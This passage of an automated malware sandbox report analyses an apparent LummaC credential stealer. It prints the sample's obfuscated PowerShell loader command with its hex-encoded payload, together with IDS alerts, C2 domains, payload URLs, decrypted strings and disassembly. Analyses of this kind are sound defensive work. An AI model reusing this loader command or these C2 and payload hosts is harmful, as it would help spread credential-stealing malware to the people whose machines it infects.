FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BD
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D0330D3F3E88BE2C45BB0C420751EC6D9A4B10B354AA
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D0330D3F3E88BE2C45BB0C420751EC6D9A4B10B354AA
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-31T08:58:25.090129+010020283713Unknown Traffic192.168.2.449889188.114.97.3443TCP
              2024-12-31T08:58:26.062022+010020283713Unknown Traffic192.168.2.449897188.114.97.3443TCP
              2024-12-31T08:58:27.075762+010020283713Unknown Traffic192.168.2.449904188.114.97.3443TCP
              2024-12-31T08:58:28.329424+010020283713Unknown Traffic192.168.2.449913188.114.97.3443TCP
              2024-12-31T08:58:29.569974+010020283713Unknown Traffic192.168.2.449919188.114.97.3443TCP
              2024-12-31T08:58:30.989336+010020283713Unknown Traffic192.168.2.449928188.114.97.3443TCP
              2024-12-31T08:58:31.963297+010020283713Unknown Traffic192.168.2.449936188.114.97.3443TCP
              2024-12-31T08:58:33.050798+010020283713Unknown Traffic192.168.2.449945188.114.97.3443TCP
              2024-12-31T08:58:34.513994+010020283713Unknown Traffic192.168.2.449951185.161.251.21443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-31T08:58:25.555547+010020546531A Network Trojan was detected192.168.2.449889188.114.97.3443TCP
              2024-12-31T08:58:26.390403+010020546531A Network Trojan was detected192.168.2.449897188.114.97.3443TCP
              2024-12-31T08:58:33.660394+010020546531A Network Trojan was detected192.168.2.449945188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-31T08:58:25.555547+010020498361A Network Trojan was detected192.168.2.449889188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-31T08:58:26.390403+010020498121A Network Trojan was detected192.168.2.449897188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-31T08:58:25.090129+010020586611Domain Observed Used for C2 Detected192.168.2.449889188.114.97.3443TCP
              2024-12-31T08:58:26.062022+010020586611Domain Observed Used for C2 Detected192.168.2.449897188.114.97.3443TCP
              2024-12-31T08:58:27.075762+010020586611Domain Observed Used for C2 Detected192.168.2.449904188.114.97.3443TCP
              2024-12-31T08:58:28.329424+010020586611Domain Observed Used for C2 Detected192.168.2.449913188.114.97.3443TCP
              2024-12-31T08:58:29.569974+010020586611Domain Observed Used for C2 Detected192.168.2.449919188.114.97.3443TCP
              2024-12-31T08:58:30.989336+010020586611Domain Observed Used for C2 Detected192.168.2.449928188.114.97.3443TCP
              2024-12-31T08:58:31.963297+010020586611Domain Observed Used for C2 Detected192.168.2.449936188.114.97.3443TCP
              2024-12-31T08:58:33.050798+010020586611Domain Observed Used for C2 Detected192.168.2.449945188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-31T08:58:24.585041+010020586601Domain Observed Used for C2 Detected192.168.2.4532991.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-31T08:58:32.485383+010020480941Malware Command and Control Activity Detected192.168.2.449936188.114.97.3443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://cegu.shop/UAvira URL Cloud: Label: malware
              Source: https://cegu.shop/Avira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txtopwAvira URL Cloud: Label: malware
              Source: https://cegu.shop:443/8574262446/ph.txtAvira URL Cloud: Label: malware
              Source: https://deduhko.klipzyroloo.shopAvira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txtebKit/537.36Avira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txtIAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txta=Avira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txtSVHjAvira URL Cloud: Label: malware
              Source: https://cegu.shop/CAvira URL Cloud: Label: malware
              Source: https://cegu.shop/xAvira URL Cloud: Label: malware
              Source: https://deduhko.klipzyroloo.shop/mazkk.emlAvira URL Cloud: Label: malware
              Source: https://deduhko.klipzyroloo.shop/mazLRAvira URL Cloud: Label: malware
              Source: https://deduhko.klipzyroloo.shop/mazkk.Avira URL Cloud: Label: malware
              Source: 10.2.powershell.exe.370000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["wholersorie.shop", "noisycuttej.shop", "imbibelubmbe.click", "tirepublicerj.shop", "abruptyopsn.shop", "framekgirus.shop", "cloudewahsj.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "jMw1IE--SHELLS"}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
              Source: 10.2.powershell.exe.370000.0.unpackString decryptor: cloudewahsj.shop
              Source: 10.2.powershell.exe.370000.0.unpackString decryptor: rabidcowse.shop
              Source: 10.2.powershell.exe.370000.0.unpackString decryptor: noisycuttej.shop
              Source: 10.2.powershell.exe.370000.0.unpackString decryptor: tirepublicerj.shop
              Source: 10.2.powershell.exe.370000.0.unpackString decryptor: framekgirus.shop
              Source: 10.2.powershell.exe.370000.0.unpackString decryptor: wholersorie.shop
              Source: 10.2.powershell.exe.370000.0.unpackString decryptor: abruptyopsn.shop
              Source: 10.2.powershell.exe.370000.0.unpackString decryptor: nearycrepso.shop
              Source: 10.2.powershell.exe.370000.0.unpackString decryptor: imbibelubmbe.click
              Source: 10.2.powershell.exe.370000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
              Source: 10.2.powershell.exe.370000.0.unpackString decryptor: TeslaBrowser/5.5
              Source: 10.2.powershell.exe.370000.0.unpackString decryptor: - Screen Resoluton:
              Source: 10.2.powershell.exe.370000.0.unpackString decryptor: - Physical Installed Memory:
              Source: 10.2.powershell.exe.370000.0.unpackString decryptor: Workgroup: -
              Source: 10.2.powershell.exe.370000.0.unpackString decryptor: jMw1IE--SHELLS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0038A5C1 CryptUnprotectData,10_2_0038A5C1
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49889 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49897 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49904 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49913 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49919 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49928 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49936 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49945 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49951 version: TLS 1.2
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: powershell.exe, 00000004.00000002.2549625066.0000000008060000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000004.00000002.2549625066.0000000008060000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06720A1Bh4_2_06720658
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06720A1Bh4_2_0672064A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06720F86h4_2_06720DB8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06720F86h4_2_06720DA8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h10_2_003B10A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx10_2_0037E9AA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx10_2_003AE41E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h10_2_003AE41E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ecx], dx10_2_003B0C70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx10_2_003AE480
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h10_2_003AE480
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 6B77B5E1h10_2_003B0E20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 6E87DD67h10_2_003ABE00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+4E1D27A6h]10_2_003ABE00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [edi+eax], 0000h10_2_00392F20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, dword ptr [esi+18h]10_2_0037AF0D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-202C4D60h]10_2_0037CF4B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-202C4D60h]10_2_0037CF4B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx-1FFDB51Dh]10_2_0037DF94
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, edi10_2_0038E92F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [ebx+eax], 0000h10_2_0038E92F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [edx+ecx], 0000h10_2_0038E92F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h10_2_0039A100
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx10_2_0039A100
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ecx], dx10_2_00385102
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], cl10_2_0039D1BA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, eax10_2_00375980
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebp, eax10_2_00375980
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edx-21379170h]10_2_003791F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, dh10_2_003AF9D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]10_2_0039BA30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esp+00000274h], 2031514Eh10_2_0039D22E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h10_2_003B1220
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1FFDB641h]10_2_00387A10
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], cl10_2_0039EA12
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+14h]10_2_00393A00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00393A00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00393A00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then inc eax10_2_00390270
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, word ptr [esi]10_2_003AF250
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ebx10_2_003AF250
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, dh10_2_003AF250
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ecx], al10_2_0038DAA8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h10_2_003AC280
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx10_2_003862C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [ebx+eax], 0000h10_2_0038AB34
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+40h]10_2_0038CB70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax10_2_00398B70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, dword ptr [ebp-20h]10_2_00398B70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, edx10_2_00398B70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, bx10_2_003973AE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]10_2_0039C3F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ebx10_2_003AF430
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, dh10_2_003AF430
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-1FFDB715h]10_2_00388C28
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax10_2_00394428
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]10_2_00372C00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+0Ch]10_2_0038B470
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-1FFDB731h]10_2_0038B470
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0Ch]10_2_0038B470
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea edx, dword ptr [ecx+20h]10_2_0039D460
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h10_2_003AFC60
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea edx, dword ptr [ecx+20h]10_2_0039D464
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ecx], dx10_2_0039A458
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea eax, dword ptr [edi+ebp]10_2_0037BC41
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+177C9E48h]10_2_0037C44A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax10_2_003984B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, dword ptr [ebp-20h]10_2_003984B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, edx10_2_003984B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]10_2_003774E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]10_2_003774E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00388CE7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax10_2_003984D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx-44E6DB40h]10_2_0038D4D6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax-80h]10_2_00399CC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h10_2_00399CC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00399CC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ebx10_2_003AF4C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, dh10_2_003AF4C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 31E2A9F4h10_2_003A9500
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ebx10_2_003AF550
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, dh10_2_003AF550
